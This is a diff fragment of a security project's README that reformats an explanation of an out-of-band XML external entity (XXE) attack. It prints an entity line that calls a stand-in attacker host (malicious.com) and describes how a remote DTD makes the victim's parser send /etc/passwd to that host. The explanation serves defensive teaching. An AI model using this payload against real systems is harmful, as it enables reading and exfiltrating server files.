security-as-code/rampart-spec/README.md

 <!ENTITY % bravo "<!ENTITY charlie SYSTEM 'http://malicious.com/xxe/get?d=%data;'>">
 ```

-In this example, the attacker hosts and controls the remote ‘xxe.dtd’ file, located at ‘http://malicious.com/dtds/xxe.dtd’.
-The attacker also controls an endpoint where data can be received, located at ‘http://malicious.com/xxe/get’, which takes a URL parameter of ‘d’ that has the victim's data assigned to it.
+In this example, the attacker hosts and controls the remote `xxe.dtd` file, located at `http://malicious.com/dtds/xxe.dtd`.
+The attacker also controls an endpoint where data can be received, located at `http://malicious.com/xxe/get`, which takes a URL parameter of ‘d’ that has the victim's data assigned to it.

-When the attacker sends the malicious XML to the victim's server, the XML parser/processor first downloads the malicious ‘xxe.dtd’ file that contains the new parameter ‘ENTITY’ definitions of ‘data’ and ‘bravo’.
-The ‘bravo’ parameter declares a value, which is actually a general external ‘ENTITY’ called ‘charlie’ which contains a URL back to the attacker's server.
-Notice that the URL parameter ‘d’ is assigned a parameter entity reference of ‘%data’ which points directly to the `/etc/passwd` file.
+When the attacker sends the malicious XML to the victim's server, the XML parser/processor first downloads the malicious `xxe.dtd` file that contains the new parameter `ENTITY` definitions of `data` and `bravo`.
+The `bravo` parameter declares a value, which is actually a general external `ENTITY` called `charlie` which contains a URL back to the attacker's server.
+Notice that the URL parameter ‘d’ is assigned a parameter entity reference of `%data` which points directly to the `/etc/passwd` file.

-Returning to the XML that was posted to the victim's server, the DTD makes references to the new components in ‘xxe.dtd’ which includes them and the general entity named ‘charlie’in the DTD.
+Returning to the XML that was posted to the victim's server, the DTD makes references to the new components in `xxe.dtd` which includes them and the general entity named `charlie` in the DTD.
 Unlike parameter entities, general entities can be referenced in the XML body.
-Once the ‘&charlie;’ reference is processed, the chain of events happens.
+Once the `&charlie;` reference is processed, the chain of events happens.
 The file `/etc/passwd` is read and an HTTP request is made back to the attacker's server with the contents of the file.

 ### Denial of Service Example